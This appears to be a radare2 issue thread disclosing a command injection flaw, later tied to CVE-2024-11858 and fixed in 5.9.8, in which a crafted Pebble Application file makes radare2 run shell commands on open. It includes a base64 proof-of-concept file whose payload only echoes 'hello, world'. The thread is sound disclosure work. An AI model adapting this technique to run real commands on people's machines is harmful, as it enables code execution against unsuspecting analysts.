Command Injection via Pebble Application files

[ifyGecko]

Environment

Mon Nov 18 18:24:50 EST 2024
radare2 5.9.7 32934 @ linux-x86-64
birth: git.5.9.6-197-g386e94dd5f 2024-11-18__23:19:30
commit: 386e94d
options: gpl -O? cs:5 cl:2 meson
Linux x86_64

Description

Well reading the Security overview it seem there is a desire to not keep bugs in secret so here is what I stumbled upon and where I am at.

While doing some fuzzing against r2 I managed to get a few crashes. Upon debugging to figure out what was going on, I noticed that it was pulling in bytes from the binary for use in r2 command parsing. I took some time and was able to inject arbitrary shell commands into a Pebble Application file created by some fuzzers such that when it is opened the commands ran before landing at the r2 shell prompt.

I do not have any idea for a patch solution yet and am going to be pretty busy for a little over two weeks so my progress will be limited until the start of December. If anyone has a solution or wants to work out one before me, feel free so the bug can be promptly fixed. I am interested in helping find a solution but work and family vacation coming up will have most of my time. Either way, I just like finding bugs.

Test

Provided is a base64 encoded Pebble Application that will run 'echo hello, world' when opened with radare2

echo "UEJMQVBQAABDQ0NDQ0NDQ0NDQ0MAAH9/f387IWVjaG8gaGVsbG8sIHdvcmxkOy4uLi4uLi5mZgpmcwAKCioKdQoKCnV1AAAAAAp1dXV1KSkpKSkpKSkpKSkpKQAAAAAAKSkpw8PDw8PDw8PDw8MgAAAAAUNDQ0NDQ0NDQsLDw9DDw8PDwwpDw8P//wFQAABDQ0NDQ0NDQ0NDQ0MAAH9/f39kAAAAZmZmQGZmZmZmZmZmZmZmZmZmZmZmZmZmZgpmcwAKCioKdQoKCuwIAENDQ0VDREREREREREREREREREREREQQAERERETDwwAAADExMTExMTExMTEAbW1tbQAAAAAAAQAAAAAAAIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKCgoKAAACAAoKAAAAAAAAAAAAAAAAAAAAAAAAAG1tbQAAbW1tbW1tCgAAADExMTExMTExMTEAbW1tbW1tCgAAAAAAMTExw8PDw8PDw8PDwyAAAAABQ0NDQ0NDQ0NDwsPD0MPDw8PDCkPDw///AQDNzc3Yzc3NzQBAzRAAAADNzYgAzc3N2M3Nzc3Nzc0QAAAAzc2IAA==" | base64 -d > example.file

radare2 example.file
ERROR: Invalid filesystem type
ERROR: Cannot mount /root
hello, world
[0x43434343]>

[trufae]

Thanks for reporting. Ill check it in few hours when i can get my hands in the laptop. My policy is to fix security bugs in less than 24h

[z00z00z00]

Hello @trufae
Is this issue related to CVE-2024-11858 ?
https://bugzilla.redhat.com/show_bug.cgi?id=2329102

RH description says "affects versions up to and including 5.9.8" but this issue seems to be fixed by 5.9.8 via 28b0bad

Thanks in advance for your confirmation :)
Best,

[trufae]

Yep. 5.9.8 is safe :)